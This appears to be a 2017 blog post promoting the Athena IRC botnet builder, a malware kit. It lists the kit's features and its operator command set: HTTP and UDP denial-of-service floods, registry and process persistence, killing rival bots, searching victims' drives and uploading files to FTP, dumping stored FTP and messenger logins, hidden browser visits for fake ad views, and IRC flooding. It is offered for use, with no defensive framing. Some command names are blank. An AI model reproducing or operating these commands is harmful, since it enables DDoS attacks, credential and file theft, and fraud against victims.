Sunday, June 18, 2017

Athena IRC Builder v2.4.0

Features of Athena
 - 10 Intense methods of DDoS
 - Anti-botkiller
 - Independent; requires no .NET framework or any 3rd party libraries
 - File searching and stealing system
 - SmartView (system for giving realistic looking views to your website or the like - ads, youtube, etc)
 - IRC War Attacks/Flooding
 - Multiple (different) methods of startup (registry and non-registry)
 - File, registry, and process persistence
 - Botkill (active botkilling, scans based on heuristics)

IRC Related Commands
!irc.join #channel [key] - Joins a channel
!irc.part #channel - Parts a channel
!irc.raw - Submit a RAW IRC command
!irc.reconnect - Reconnects to IRC after waiting 15 seconds
!irc.silent on/off - Toggles bot output to channel
! - Separates bots based on location
!irc.sort.privelages - Separates bots based on Admin/User privelages
!irc.sort.gender - Separates laptops and desktops
!irc.sort.os - Separates bots based on operating system
!irc.sort.architecture - Separates bots based on architecture
!irc.sort.dotnet - Separates bots by version of .NET Framework installed

DDoS Commands
[Port 80 is most common for websites]
!ddos.http.slowloris - Attacks a target webserver with many concurrent connections
!ddos.http.rapidget - Sends mass amounts of randomized GET packets to a given target
!ddos.http.rudy - Slowly posts content by the masses to a target webserver
!ddos.http.rapidpost - Sends mass amounts of randomized POST packets to a given target
!ddos.http.slowpost – Holds many concurrent connections to a webserver through POST methods
!ddos.http.arme - Abuses partial content headers in order to harm a target webserver
!ddos.http.bandwith - This is a download based flood targetted torwards larger files and downloadable content on websites
!ddos.layer4.udp - Sends mass amounts of packets containing random data to a target host/ip
!ddos.layer4.ecf - Floods a target with rapid connections and disconnections (Previously named condis) (ECF stands for Established Connection Flooding)
!ddos.stop - Ends any currently running DDoS
(Example: !ddos.http.rapidget 80 300)

!ddos.browser 60 - Floods a website through html scripts and hidden browsers. Effective against sites heavy on browser based scripts.
!ddos.browser.stop - Ends any currently running Browser Based DDoS

!http.hostblock - Blocks a host
!http.status - Outputs the current status of a given URL (ie. 200 OK, 302 Found, 404 Not Found, etc)

File Searching, Stealing, and Modification Commands
!ftp.upload C:\Archive.rar ftpuser ftppass - Uploads a given file to a given FTP server
!filesearch .exe - Searches entire bot computer for a given file name or piece of a file name, and outputs how many instances of it occured
!filesearch.output .rar - Functionality is the same as above, but the bot outputs the file path of the searched item
!filesearch.stop - Ends any of the existing three above types of file searches

Website View Commands
!view - Views a given website in a random existing browser visibly
!view.hidden - Views a given website in a random existing browser hidden
!smartview.add 1080 300 - Adds a given URL to the 'SmartView' queue
!smartview.del - Deletes a given URL from the 'SmartView' queue if it exists
!smartview.clear - Clears the entire 'SmartView' queue

Recovery Commands
!recovery.ftp – Outputs existing FTP logins on the bot computer
! – Outputs existing IM logins on the bot computer

IRC War Commands
!war.connect 6667 – Connects to a given IRC in multiple sockets
!war.disconnect – Disconnects from a previously connected to IRC
!war.status – Outputs the amount of verified connections to IRC and the status of what the bot is currently doing
!war.raw PRIVMSG #channel :raw message – Submits a RAW IRC command
!war.join #channel channelkey – Joins a channel with an optional key
!war.part #channel part message – Parts a channel with an optional part message
!war.msg user/#channel message here – Sends a message to a given user or channel
!war.notice user/#channel message here – Sends a notice to a given user or channel
!war.invite user – Invites a user to a random channel. Clients that have auto-join on invite are affected badly
!war.ctcp user – Floods a user with CTCP requests. This often disconnects users
!war.dcc user – Floods a user with DCC requests. This often disconnects users
!war.kill.user nickname – Attempts to kill a user from IRC
!war.kill.user.multi nick1 nick2 nick3 - Attempts to kill a list of users from IRC
! #channel – Floods a given channel
! #channel – Floods a channel through mass joins and parts
!war.flood.anope – Floods Anope services. Anope will crash if enough bots are used.
!war.stop – Stops an existing flood
